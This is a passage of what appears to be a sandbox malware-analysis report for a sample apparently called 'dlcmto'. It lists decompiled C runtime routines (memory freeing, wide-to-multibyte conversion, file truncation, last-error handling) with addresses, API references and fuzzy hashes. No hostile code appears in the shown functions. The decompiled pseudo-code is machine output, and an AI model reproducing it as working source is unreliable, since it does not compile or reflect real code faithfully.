										_push(_t128);
										_push(_t128);
										_push(_t128);
										E011964E1();
										asm("int3");
										_push(_t180);
										_push(_t171);
										_t175 = _v72;
										_push(_t161);
										__eflags = _t175;
										if(_t175 != 0) {
											_t163 = 0;
											__eflags =  *_t175;
											if( *_t175 != 0) {
												_t107 = E011973AB(_a8, 9, _t175, 0xffffffff, 0, 0);
												__eflags = _t107;
												if(__eflags != 0) {
													_t164 = _v0;
													__eflags = _t107 -  *((intOrPtr*)(_t164 + 0xc));
													if(__eflags <= 0) {
														L45:
														_t108 = E011973AB(_a8, 9, _t175, 0xffffffff,  *((intOrPtr*)(_t164 + 8)),  *((intOrPtr*)(_t164 + 0xc)));
														__eflags = _t108;
														if(__eflags == 0) {
															goto L42;
														} else {
															_t113 = _t108 - 1;
															__eflags = _t113;
															 *(_t164 + 0x10) = _t113;
															goto L47;
														}
													} else {
														_t112 = E0119782A(_t164, __eflags, _t107);
														__eflags = _t112;
														if(_t112 == 0) {
															goto L45;
														}
													}
												} else {
													L42:
													E01196E65(GetLastError());
													_t112 =  *(E01196E3F(__eflags));
												}
											} else {
												_t177 = _v0;
												__eflags =  *(_t177 + 0xc);
												if(__eflags != 0) {
													L40:
													 *((short*)( *((intOrPtr*)(_t177 + 8)))) = 0;
													goto L36;
												} else {
													_t112 = E0119782A(_t177, __eflags, 1);
													__eflags = _t112;
													if(_t112 == 0) {
														goto L40;
													}
												}
											}
										} else {
											_t177 = _v0;
											E01197869(_t177);
											_t163 = 0;
											__eflags = 0;
											 *((intOrPtr*)(_t177 + 8)) = 0;
											 *(_t177 + 0xc) = 0;
											L36:
											 *((intOrPtr*)(_t177 + 0x10)) = _t163;
											L47:
											_t112 = 0;
											__eflags = 0;
										}
										return _t112;
									} else {
										goto L24;
									}
									goto L49;
									L24:
									_t116 = _v16;
									_t143 = _v20;
									 *((intOrPtr*)(_v36 + _t116)) = _t143;
									_t88 = _t116 + 4;
									_t132 = _t143 + _v24;
									_v20 = _t143 + _v24;
									_v16 = _t88;
									__eflags = _t88 - _v44;
								} while (_t88 != _v44);
								goto L25;
							}
						} else {
							_t172 = _t171 | 0xffffffff;
							_v16 = _t172;
							L26:
							E011963FE(_t128);
							_pop(_t133);
							goto L27;
						}
					} else {
						do {
							_v12 = 0x3f2a;
							_v10 = _t128;
							_t121 = E0119BB80(_t80,  &_v12);
							_t133 =  *_t167;
							__eflags = _t121;
							if(_t121 != 0) {
								_t122 = E01197D84(_t167, _t133, _t121,  &_v48);
								_t183 = _t183 + 0xc;
								_v16 = _t122;
								_t172 = _t122;
							} else {
								_push( &_v48);
								_t172 = E01197CD3(_t133, _t167, _t133, _t128, _t128);
								_t183 = _t183 + 0x10;
								_v16 = _t172;
							}
							__eflags = _t172;
							if(_t172 != 0) {
								_t161 = _v48;
								L27:
								_t152 = _t161;
								_v36 = _t152;
								__eflags = _v44 - _t152;
								asm("sbb ecx, ecx");
								_t135 =  !_t133 & _v44 - _t152 + 0x00000003 >> 0x00000002;
								__eflags = _t135;
								_v32 = _t135;
								if(_t135 != 0) {
									_t174 = _t135;
									do {
										E011963FE( *_t161);
										_t128 = _t128 + 1;
										_t161 = _t161 + 4;
										__eflags = _t128 - _t174;
									} while (_t128 != _t174);
									_t161 = _v48;
									_t172 = _v16;
								}
								E011963FE(_t161);
								goto L32;
							} else {
								goto L8;
							}
							goto L49;
							L8:
							_t167 =  &(_v0[1]);
							_v0 = _t167;
							_t80 =  *_t167;
							__eflags = _t80;
						} while (_t80 != 0);
						_t161 = _v48;
						_t131 = _v44;
						goto L10;
					}
				} else {
					_t125 = E01196E3F(_t187);
					_t172 = 0x16;
					 *_t125 = _t172;
					E011964D1();
					L32:
					return _t172;
				}
				L49:
			}





























































                                          0x011977c6
                                          0x011978df
                                          0x011978e1
                                          0x011978e4
                                          0x011978e8
                                          0x011978ea
                                          0x01197900
                                          0x01197904
                                          0x01197907
                                          0x01197909
                                          0x0119790b
                                          0x0119790d
                                          0x0119790f
                                          0x01197912
                                          0x01197915
                                          0x01197918
                                          0x0119791a
                                          0x0119797d
                                          0x0119797f
                                          0x01197982
                                          0x01197984
                                          0x01197988
                                          0x01197991
                                          0x01197992
                                          0x01197995
                                          0x01197997
                                          0x0119799a
                                          0x0119799e
                                          0x0119799e
                                          0x011979a0
                                          0x011979a2
                                          0x011979a4
                                          0x011979a6
                                          0x011979a6
                                          0x011979a8
                                          0x011979ab
                                          0x011979ae
                                          0x011979ae
                                          0x011979b0
                                          0x011979b1
                                          0x011979b1
                                          0x011979bc
                                          0x011979be
                                          0x011979c1
                                          0x011979c2
                                          0x011979c5
                                          0x011979c5
                                          0x011979c9
                                          0x011979cc
                                          0x011979cf
                                          0x011979cf
                                          0x011979cf
                                          0x011979dc
                                          0x011979de
                                          0x011979e1
                                          0x011979e3
                                          0x011979fb
                                          0x011979fe
                                          0x01197a01
                                          0x01197a03
                                          0x01197a06
                                          0x01197a08
                                          0x01197a0b
                                          0x01197a0e
                                          0x01197a6b
                                          0x01197a6e
                                          0x01197a71
                                          0x01197a73
                                          0x00000000
                                          0x01197a10
                                          0x01197a12
                                          0x01197a12
                                          0x01197a14
                                          0x01197a17
                                          0x01197a17
                                          0x01197a19
                                          0x01197a1b
                                          0x01197a21
                                          0x01197a24
                                          0x01197a24
                                          0x01197a26
                                          0x01197a27
                                          0x01197a27
                                          0x01197a2e
                                          0x01197a31
                                          0x01197a35
                                          0x01197a42
                                          0x01197a47
                                          0x01197a4a
                                          0x01197a4c
                                          0x01197ac0
                                          0x01197ac1
                                          0x01197ac2
                                          0x01197ac3
                                          0x01197ac4
                                          0x01197ac5
                                          0x01197aca
                                          0x01197acd
                                          0x01197ad0
                                          0x01197ad1
                                          0x01197ad4
                                          0x01197ad5
                                          0x01197ad7
                                          0x01197af3
                                          0x01197af5
                                          0x01197af8
                                          0x01197b23
                                          0x01197b2b
                                          0x01197b2d
                                          0x01197b45
                                          0x01197b48
                                          0x01197b4b
                                          0x01197b59
                                          0x01197b67
                                          0x01197b6f
                                          0x01197b71
                                          0x00000000
                                          0x01197b73
                                          0x01197b73
                                          0x01197b73
                                          0x01197b74
                                          0x00000000
                                          0x01197b74
                                          0x01197b4d
                                          0x01197b50
                                          0x01197b55
                                          0x01197b57
                                          0x00000000
                                          0x00000000
                                          0x01197b57
                                          0x01197b2f
                                          0x01197b2f
                                          0x01197b36
                                          0x01197b41
                                          0x01197b41
                                          0x01197afa
                                          0x01197afa
                                          0x01197afd
                                          0x01197b00
                                          0x01197b0f
                                          0x01197b14
                                          0x00000000
                                          0x01197b02
                                          0x01197b06
                                          0x01197b0b
                                          0x01197b0d
                                          0x00000000
                                          0x00000000
                                          0x01197b0d
                                          0x01197b00
                                          0x01197ad9
                                          0x01197ad9
                                          0x01197ade
                                          0x01197ae3
                                          0x01197ae3
                                          0x01197ae5
                                          0x01197ae8
                                          0x01197aeb
                                          0x01197aeb
                                          0x01197b77
                                          0x01197b77
                                          0x01197b77
                                          0x01197b77
                                          0x01197b7c
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x01197a4e
                                          0x01197a4e
                                          0x01197a54
                                          0x01197a57
                                          0x01197a5a
                                          0x01197a5d
                                          0x01197a60
                                          0x01197a63
                                          0x01197a66
                                          0x01197a66
                                          0x00000000
                                          0x01197a17
                                          0x011979e5
                                          0x011979e5
                                          0x011979e8
                                          0x01197a75
                                          0x01197a76
                                          0x01197a7b
                                          0x00000000
                                          0x01197a7b
                                          0x0119791c
                                          0x0119791c
                                          0x0119791f
                                          0x01197927
                                          0x0119792a
                                          0x01197931
                                          0x01197933
                                          0x01197935
                                          0x01197953
                                          0x01197958
                                          0x0119795b
                                          0x0119795e
                                          0x01197937
                                          0x0119793a
                                          0x01197943
                                          0x01197945
                                          0x01197948
                                          0x01197948
                                          0x01197960
                                          0x01197962
                                          0x011979f0
                                          0x01197a7c
                                          0x01197a7f
                                          0x01197a83
                                          0x01197a8c
                                          0x01197a8f
                                          0x01197a93
                                          0x01197a93
                                          0x01197a95
                                          0x01197a98
                                          0x01197a9a
                                          0x01197a9c
                                          0x01197a9e
                                          0x01197aa3
                                          0x01197aa4
                                          0x01197aa8
                                          0x01197aa8
                                          0x01197aac
                                          0x01197aaf
                                          0x01197aaf
                                          0x01197ab3
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x01197968
                                          0x0119796b
                                          0x0119796e
                                          0x01197971
                                          0x01197973
                                          0x01197973
                                          0x01197977
                                          0x0119797a
                                          0x00000000
                                          0x0119797a
                                          0x011978ec
                                          0x011978ec
                                          0x011978f3
                                          0x011978f4
                                          0x011978f6
                                          0x01197abb
                                          0x01197abf
                                          0x01197abf
                                          0x00000000

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.255634635.0000000001191000.00000020.00000001.01000000.00000004.sdmp, Offset: 01190000, based on PE: true
                                          • Associated: 00000001.00000002.255620385.0000000001190000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000001.00000002.255689187.00000000011A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000001.00000002.255702128.00000000011A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000001.00000002.255702128.00000000011A9000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000001.00000002.255717575.00000000011AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_1190000_dlcmto.jbxd
                                          Similarity
                                          • API ID: _free_strpbrk
                                          • String ID:
                                          • API String ID: 3300345361-0
                                          • Opcode ID: bda19d7ccd6eda8565635fa3cb6ba869e4ce1bba604ab6411c39544b5cae7ffd
                                          • Instruction ID: 5a10773bffc458d872df8bcd246c3503234ed631c91c1e127fc416754ec0ce8f
                                          • Opcode Fuzzy Hash: bda19d7ccd6eda8565635fa3cb6ba869e4ce1bba604ab6411c39544b5cae7ffd
                                          • Instruction Fuzzy Hash: A3613D75D10219AFDF19CFA8C8809EDFBF5EF48214B19816AD865E7340E735AE418B90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0119D3A1 Relevance: 6.1, APIs: 4, Instructions: 132fileCOMMONLIBRARYCODE
                                          Download Yara Rule
                                          C-Code - Quality: 94%
                                          			E0119D3A1(signed int __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v20;
				int _v24;
				int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				int _t30;
				signed int _t31;
				intOrPtr* _t36;
				int _t40;
				int _t41;
				void* _t42;
				void* _t54;
				void* _t56;
				signed int _t58;
				intOrPtr _t59;
				int _t60;
				void* _t62;
				void* _t63;
				int _t68;

				_t58 = __edx;
				_t50 = _a4;
				E0119D511( &_v44, __edx, _a4, _a8, _a12);
				if((_v44 & _v40) == 0xffffffff || (_v36 & _v32) == 0xffffffff) {
					L28:
					_t59 =  *((intOrPtr*)(E01196E3F(__eflags)));
					goto L29;
				} else {
					_t30 = _v24;
					_t60 = _v28;
					_v8 = _t30;
					_t68 = _t30;
					if(_t68 < 0) {
						L25:
						_t31 = E0119A08D(_t50, _a8, _a12, 0);
						_t63 = _t63 + 0x10;
						__eflags = (_t31 & _t58) - 0xffffffff;
						if(__eflags == 0) {
							goto L28;
						}
						__eflags = SetEndOfFile(E01198B88(_t50));
						if(__eflags != 0) {
							L18:
							_t59 = 0;
							L29:
							E0119A08D(_v20, _v44, _v40, 0);
							return _t59;
						}
						 *((intOrPtr*)(E01196E3F(__eflags))) = 0xd;
						_t36 = E01196E52(__eflags);
						 *_t36 = GetLastError();
						goto L28;
					}
					if(_t68 > 0 || _t60 != 0) {
						_t62 = E011971A3(0x1000, 1);
						_pop(_t54);
						_t70 = _t62;
						if(_t62 != 0) {
							_v12 = E01193BF5(_t54, _t50, 0x8000);
							_t40 = _v24;
							_pop(_t56);
							do {
								__eflags = _t40;
								if(__eflags < 0) {
									L12:
									_t41 = _t60;
									L13:
									_t42 = E0119AB0C(_t50, _t62, _t41);
									_t63 = _t63 + 0xc;
									__eflags = _t42 - 0xffffffff;
									if(__eflags == 0) {
										__eflags =  *((intOrPtr*)(E01196E52(__eflags))) - 5;
										if(__eflags == 0) {
											 *((intOrPtr*)(E01196E3F(__eflags))) = 0xd;
										}
										L21:
										_t59 =  *((intOrPtr*)(E01196E3F(_t70)));
										E011963FE(_t62);
										goto L29;
									}
									asm("cdq");
									_t60 = _t60 - _t42;
									_t40 = _v8;
									asm("sbb eax, edx");
									_v8 = _t40;
									__eflags = _t40;
									if(__eflags > 0) {
										L11:
										_t41 = 0x1000;
										goto L13;
									}
									if(__eflags < 0) {
										break;
									}
									goto L16;
								}
								if(__eflags > 0) {
									goto L11;
								}
								__eflags = _t60 - 0x1000;
								if(_t60 < 0x1000) {
									goto L12;
								}
								goto L11;
								L16:
								__eflags = _t60;
							} while (_t60 != 0);
							E01193BF5(_t56, _t50, _v12);
							E011963FE(_t62);
							_t63 = _t63 + 0xc;
							goto L18;
						}
						 *((intOrPtr*)(E01196E3F(_t70))) = 0xc;
						goto L21;
					} else {
						__eflags = _t30;
						if(__eflags > 0) {
							goto L18;
						}
						if(__eflags < 0) {
							goto L25;
						}
						__eflags = _t60;
						if(_t60 >= 0) {
							goto L18;
						}
						goto L25;
					}
				}
			}


























                                          0x0119d3a1
                                          0x0119d3aa
                                          0x0119d3b9
                                          0x0119d3c7
                                          0x0119d4f0
                                          0x0119d4f5
                                          0x00000000
                                          0x0119d3dc
                                          0x0119d3dc
                                          0x0119d3df
                                          0x0119d3e2
                                          0x0119d3e5
                                          0x0119d3e7
                                          0x0119d4ac
                                          0x0119d4b5
                                          0x0119d4bc
                                          0x0119d4bf
                                          0x0119d4c2
                                          0x00000000
                                          0x00000000
                                          0x0119d4d2
                                          0x0119d4d4
                                          0x0119d479
                                          0x0119d479
                                          0x0119d4f7
                                          0x0119d502
                                          0x0119d510
                                          0x0119d510
                                          0x0119d4db
                                          0x0119d4e1
                                          0x0119d4ee
                                          0x00000000
                                          0x0119d4ee
                                          0x0119d3ed
                                          0x0119d403
                                          0x0119d406
                                          0x0119d407
                                          0x0119d409
                                          0x0119d424
                                          0x0119d427
                                          0x0119d42a
                                          0x0119d42b
                                          0x0119d42b
                                          0x0119d42d
                                          0x0119d440
                                          0x0119d440
                                          0x0119d442
                                          0x0119d445
                                          0x0119d44a
                                          0x0119d44d
                                          0x0119d450
                                          0x0119d482
                                          0x0119d485
                                          0x0119d48c
                                          0x0119d48c
                                          0x0119d492
                                          0x0119d498
                                          0x0119d49a
                                          0x00000000
                                          0x0119d49f
                                          0x0119d452
                                          0x0119d453
                                          0x0119d455
                                          0x0119d458
                                          0x0119d45a
                                          0x0119d45d
                                          0x0119d45f
                                          0x0119d439
                                          0x0119d439
                                          0x00000000
                                          0x0119d439
                                          0x0119d461
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0119d461
                                          0x0119d42f
                                          0x00000000
                                          0x00000000
                                          0x0119d431
                                          0x0119d437
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0119d463
                                          0x0119d463
                                          0x0119d463
                                          0x0119d46b
                                          0x0119d471
                                          0x0119d476
                                          0x00000000
                                          0x0119d476
                                          0x0119d410
                                          0x00000000
                                          0x0119d4a2
                                          0x0119d4a2
                                          0x0119d4a4
                                          0x00000000
                                          0x00000000
                                          0x0119d4a6
                                          0x00000000
                                          0x00000000
                                          0x0119d4a8
                                          0x0119d4aa
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0119d4aa
                                          0x0119d3ed

                                          APIs
                                          • _free.LIBCMT ref: 0119D471
                                          • _free.LIBCMT ref: 0119D49A
                                          • SetEndOfFile.KERNEL32(00000000,0119CA90,00000000,01199280,?,?,?,?,?,?,?,0119CA90,01199280,00000000), ref: 0119D4CC
                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,0119CA90,01199280,00000000,?,?,?,?,00000000,?), ref: 0119D4E8
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.255634635.0000000001191000.00000020.00000001.01000000.00000004.sdmp, Offset: 01190000, based on PE: true
                                          • Associated: 00000001.00000002.255620385.0000000001190000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000001.00000002.255689187.00000000011A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000001.00000002.255702128.00000000011A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000001.00000002.255702128.00000000011A9000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000001.00000002.255717575.00000000011AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_1190000_dlcmto.jbxd
                                          Similarity
                                          • API ID: _free$ErrorFileLast
                                          • String ID:
                                          • API String ID: 1547350101-0
                                          • Opcode ID: c4ca28499e8d541e63e9a06c26e2fbba62088e809de7ae0ba348d85b398998bc
                                          • Instruction ID: 807c8d37c7a11a958ba056f1663ce8be036757353ba04ad5ad9cccf2302dbe65
                                          • Opcode Fuzzy Hash: c4ca28499e8d541e63e9a06c26e2fbba62088e809de7ae0ba348d85b398998bc
                                          • Instruction Fuzzy Hash: BA41C172900206ABDF1DABFCEC44BDE3BB5EF94324F190550E934A7590EB30E8518761
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 01197B7D Relevance: 6.1, APIs: 4, Instructions: 86COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E01197B7D(intOrPtr* _a4, intOrPtr _a8, intOrPtr _a16) {
				intOrPtr _t16;
				intOrPtr _t17;
				intOrPtr _t19;
				intOrPtr _t29;
				char _t31;
				intOrPtr _t38;
				intOrPtr* _t40;
				intOrPtr _t41;

				_t40 = _a4;
				if(_t40 != 0) {
					_t31 = 0;
					__eflags =  *_t40;
					if( *_t40 != 0) {
						_t16 = E011986B8(_a16, 0, _t40, 0xffffffff, 0, 0, 0, 0);
						__eflags = _t16;
						if(__eflags != 0) {
							_t38 = _a8;
							__eflags = _t16 -  *((intOrPtr*)(_t38 + 0xc));
							if(__eflags <= 0) {
								L11:
								_t17 = E011986B8(_a16, _t31, _t40, 0xffffffff,  *((intOrPtr*)(_t38 + 8)),  *((intOrPtr*)(_t38 + 0xc)), _t31, _t31);
								__eflags = _t17;
								if(__eflags != 0) {
									 *((intOrPtr*)(_t38 + 0x10)) = _t17 - 1;
									_t19 = 0;
									__eflags = 0;
								} else {
									E01196E65(GetLastError());
									_t19 =  *((intOrPtr*)(E01196E3F(__eflags)));
								}
								L14:
								return _t19;
							}
							_t19 = E011978A0(_t38, __eflags, _t16);
							__eflags = _t19;
							if(_t19 != 0) {
								goto L14;
							}
							goto L11;
						}
						E01196E65(GetLastError());
						return  *((intOrPtr*)(E01196E3F(__eflags)));
					}
					_t41 = _a8;
					__eflags =  *((intOrPtr*)(_t41 + 0xc));
					if(__eflags != 0) {
						L6:
						 *((char*)( *((intOrPtr*)(_t41 + 8)))) = _t31;
						L2:
						 *((intOrPtr*)(_t41 + 0x10)) = _t31;
						return 0;
					}
					_t29 = E011978A0(_t41, __eflags, 1);
					__eflags = _t29;
					if(_t29 != 0) {
						return _t29;
					}
					goto L6;
				}
				_t41 = _a8;
				E01197869(_t41);
				_t31 = 0;
				 *((intOrPtr*)(_t41 + 8)) = 0;
				 *((intOrPtr*)(_t41 + 0xc)) = 0;
				goto L2;
			}











                                          0x01197b84
                                          0x01197b89
                                          0x01197ba7
                                          0x01197ba9
                                          0x01197bac
                                          0x01197bd9
                                          0x01197be1
                                          0x01197be3
                                          0x01197bfc
                                          0x01197bff
                                          0x01197c02
                                          0x01197c10
                                          0x01197c1f
                                          0x01197c27
                                          0x01197c29
                                          0x01197c42
                                          0x01197c45
                                          0x01197c45
                                          0x01197c2b
                                          0x01197c32
                                          0x01197c3d
                                          0x01197c3d
                                          0x01197c47
                                          0x00000000
                                          0x01197c47
                                          0x01197c07
                                          0x01197c0c
                                          0x01197c0e
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x01197c0e
                                          0x01197bec
                                          0x00000000
                                          0x01197bf7
                                          0x01197bae
                                          0x01197bb1
                                          0x01197bb4
                                          0x01197bc7
                                          0x01197bca
                                          0x01197b9d
                                          0x01197b9d
                                          0x00000000
                                          0x01197ba0
                                          0x01197bba
                                          0x01197bbf
                                          0x01197bc1
                                          0x01197c4b
                                          0x01197c4b
                                          0x00000000
                                          0x01197bc1
                                          0x01197b8b
                                          0x01197b90
                                          0x01197b95
                                          0x01197b97
                                          0x01197b9a
                                          0x00000000

                                          APIs
                                            • Part of subcall function 01197869: _free.LIBCMT ref: 01197877
                                            • Part of subcall function 011986B8: WideCharToMultiByte.KERNEL32(?,00000000,01196BBD,00000000,00000001,01196CD1,0119AC31,?,01196BBD,?,00000000,?,0119B3ED,0000FDE9,00000000,?), ref: 0119875A
                                          • GetLastError.KERNEL32(?,?,?,00000000,00000000,?,01197EF1,?,?,?,00000000), ref: 01197BE5
                                          • __dosmaperr.LIBCMT ref: 01197BEC
                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,01197EF1,?), ref: 01197C2B
                                          • __dosmaperr.LIBCMT ref: 01197C32
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.255634635.0000000001191000.00000020.00000001.01000000.00000004.sdmp, Offset: 01190000, based on PE: true
                                          • Associated: 00000001.00000002.255620385.0000000001190000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000001.00000002.255689187.00000000011A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000001.00000002.255702128.00000000011A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000001.00000002.255702128.00000000011A9000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000001.00000002.255717575.00000000011AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_1190000_dlcmto.jbxd
                                          Similarity
                                          • API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
                                          • String ID:
                                          • API String ID: 167067550-0
                                          • Opcode ID: 585819088e5ab273703aa041535432fc932e6097d8ee019b0e8a71ed6d5e9950
                                          • Instruction ID: becde46ec15d6b56298055e59c5e3de5f78017a5ad4182b91ae5c6b47d2f1892
                                          • Opcode Fuzzy Hash: 585819088e5ab273703aa041535432fc932e6097d8ee019b0e8a71ed6d5e9950
                                          • Instruction Fuzzy Hash: 18219572614217AFDF2DAF69CC80C2BB7ADEF456687118528F93997180E731EC418FA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 011954CF Relevance: 6.1, APIs: 4, Instructions: 72COMMONLIBRARYCODE
                                          Download Yara Rule
                                          C-Code - Quality: 79%
                                          			E011954CF(void* __ecx, void* __edx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t2;
				long _t3;
				intOrPtr _t5;
				long _t6;
				intOrPtr _t9;
				long _t10;
				signed int _t39;
				signed int _t40;
				void* _t43;
				void* _t49;
				signed int _t51;
				signed int _t53;
				signed int _t54;
				long _t56;
				long _t60;
				long _t61;
				void* _t65;

				_t49 = __edx;
				_t43 = __ecx;
				_t60 = GetLastError();
				_t2 =  *0x11a7230; // 0x7
				_t67 = _t2 - 0xffffffff;
				if(_t2 == 0xffffffff) {
					L6:
					_t3 = E011950C1(__eflags, _t2, 0xffffffff);
					__eflags = _t3;
					if(_t3 == 0) {
						goto L3;
					} else {
						_t51 = E011971A3(1, 0x364);
						_pop(_t43);
						__eflags = _t51;
						if(__eflags != 0) {
							__eflags = E011950C1(__eflags,  *0x11a7230, _t51);
							if(__eflags != 0) {
								E01195747(_t51, 0x11a9688);
								E011963FE(0);
								_t65 = _t65 + 0xc;
								goto L13;
							} else {
								_t39 = 0;
								E011950C1(__eflags,  *0x11a7230, 0);
								_push(_t51);
								goto L9;
							}
						} else {
							_t39 = 0;
							__eflags = 0;
							E011950C1(0,  *0x11a7230, 0);
							_push(0);
							L9:
							E011963FE();
							_pop(_t43);
							goto L4;
						}
					}
				} else {
					_t51 = E01195082(_t67, _t2);
					if(_t51 == 0) {
						_t2 =  *0x11a7230; // 0x7
						goto L6;
					} else {
						if(_t51 != 0xffffffff) {
							L13:
							_t39 = _t51;
						} else {
							L3:
							_t39 = 0;
							L4:
							_t51 = _t39;
						}
					}
				}
				SetLastError(_t60);
				asm("sbb edi, edi");
				_t53 =  ~_t51 & _t39;
				if(_t53 == 0) {
					E01194A08(_t39, _t43, _t49, _t53, _t60);
					asm("int3");
					_t5 =  *0x11a7230; // 0x7
					_push(_t60);
					__eflags = _t5 - 0xffffffff;
					if(__eflags == 0) {
						L22:
						_t6 = E011950C1(__eflags, _t5, 0xffffffff);
						__eflags = _t6;
						if(_t6 == 0) {
							goto L31;
						} else {
							_t60 = E011971A3(1, 0x364);
							_pop(_t43);
							__eflags = _t60;
							if(__eflags != 0) {
								__eflags = E011950C1(__eflags,  *0x11a7230, _t60);
								if(__eflags != 0) {
									E01195747(_t60, 0x11a9688);
									E011963FE(0);
									_t65 = _t65 + 0xc;
									goto L29;
								} else {
									E011950C1(__eflags,  *0x11a7230, _t21);
									_push(_t60);
									goto L25;
								}
							} else {
								E011950C1(__eflags,  *0x11a7230, _t20);
								_push(_t60);
								L25:
								E011963FE();
								_pop(_t43);
								goto L31;
							}
						}
					} else {
						_t60 = E01195082(__eflags, _t5);
						__eflags = _t60;
						if(__eflags == 0) {
							_t5 =  *0x11a7230; // 0x7
							goto L22;
						} else {
							__eflags = _t60 - 0xffffffff;
							if(_t60 == 0xffffffff) {
								L31:
								E01194A08(_t39, _t43, _t49, _t53, _t60);
								asm("int3");
								_push(_t39);
								_push(_t60);
								_push(_t53);
								_t61 = GetLastError();
								_t9 =  *0x11a7230; // 0x7
								__eflags = _t9 - 0xffffffff;
								if(__eflags == 0) {
									L38:
									_t10 = E011950C1(__eflags, _t9, 0xffffffff);
									__eflags = _t10;
									if(_t10 == 0) {
										goto L35;
									} else {
										_t54 = E011971A3(1, 0x364);
										__eflags = _t54;
										if(__eflags != 0) {
											__eflags = E011950C1(__eflags,  *0x11a7230, _t54);
											if(__eflags != 0) {
												E01195747(_t54, 0x11a9688);
												E011963FE(0);
												goto L45;
											} else {
												_t40 = 0;
												E011950C1(__eflags,  *0x11a7230, 0);
												_push(_t54);
												goto L41;
											}
										} else {
											_t40 = 0;
											__eflags = 0;
											E011950C1(0,  *0x11a7230, 0);
											_push(0);
											L41:
											E011963FE();
											goto L36;
										}
									}
								} else {
									_t54 = E01195082(__eflags, _t9);
									__eflags = _t54;
									if(__eflags == 0) {
										_t9 =  *0x11a7230; // 0x7
										goto L38;
									} else {
										__eflags = _t54 - 0xffffffff;
										if(_t54 != 0xffffffff) {
											L45:
											_t40 = _t54;
										} else {
											L35:
											_t40 = 0;
											__eflags = 0;
											L36:
											_t54 = _t40;
										}
									}
								}
								SetLastError(_t61);
								asm("sbb edi, edi");
								_t56 =  ~_t54 & _t40;
								__eflags = _t56;
								return _t56;
							} else {
								L29:
								__eflags = _t60;
								if(_t60 == 0) {
									goto L31;
								} else {
									return _t60;
								}
							}
						}
					}
				} else {
					return _t53;
				}
			}























                                          0x011954cf
                                          0x011954cf
                                          0x011954da
                                          0x011954dc
                                          0x011954e1
                                          0x011954e4
                                          0x01195502
                                          0x01195505
                                          0x0119550a
                                          0x0119550c
                                          0x00000000
                                          0x0119550e
                                          0x0119551a
                                          0x0119551d
                                          0x0119551e
                                          0x01195520
                                          0x01195545
                                          0x01195547
                                          0x01195560
                                          0x01195567
                                          0x0119556c
                                          0x00000000
                                          0x01195549
                                          0x01195549
                                          0x01195552
                                          0x01195557
                                          0x00000000
                                          0x01195557
                                          0x01195522
                                          0x01195522
                                          0x01195522
                                          0x0119552b
                                          0x01195530
                                          0x01195531
                                          0x01195531
                                          0x01195536
                                          0x00000000
                                          0x01195536
                                          0x01195520
                                          0x011954e6
                                          0x011954ec
                                          0x011954f0
                                          0x011954fd
                                          0x00000000
                                          0x011954f2
                                          0x011954f5
                                          0x0119556f
                                          0x0119556f
                                          0x011954f7
                                          0x011954f7
                                          0x011954f7
                                          0x011954f9
                                          0x011954f9
                                          0x011954f9
                                          0x011954f5
                                          0x011954f0
                                          0x01195572
                                          0x0119557a
                                          0x0119557c
                                          0x0119557e
                                          0x01195586
                                          0x0119558b
                                          0x0119558c
                                          0x01195591
                                          0x01195592
                                          0x01195595
                                          0x011955af
                                          0x011955b2
                                          0x011955b7
                                          0x011955b9
                                          0x00000000
                                          0x011955bb
                                          0x011955c7
                                          0x011955ca
                                          0x011955cb
                                          0x011955cd
                                          0x011955f0
                                          0x011955f2
                                          0x01195609
                                          0x01195610
                                          0x01195615
                                          0x00000000
                                          0x011955f4
                                          0x011955fb
                                          0x01195600
                                          0x00000000
                                          0x01195600
                                          0x011955cf
                                          0x011955d6
                                          0x011955db
                                          0x011955dc
                                          0x011955dc
                                          0x011955e1
                                          0x00000000
                                          0x011955e1
                                          0x011955cd
                                          0x01195597
                                          0x0119559d
                                          0x0119559f
                                          0x011955a1
                                          0x011955aa
                                          0x00000000
                                          0x011955a3
                                          0x011955a3
                                          0x011955a6
                                          0x01195620
                                          0x01195620
                                          0x01195625
                                          0x01195628
                                          0x01195629
                                          0x0119562a
                                          0x01195631
                                          0x01195633
                                          0x01195638
                                          0x0119563b
                                          0x01195659
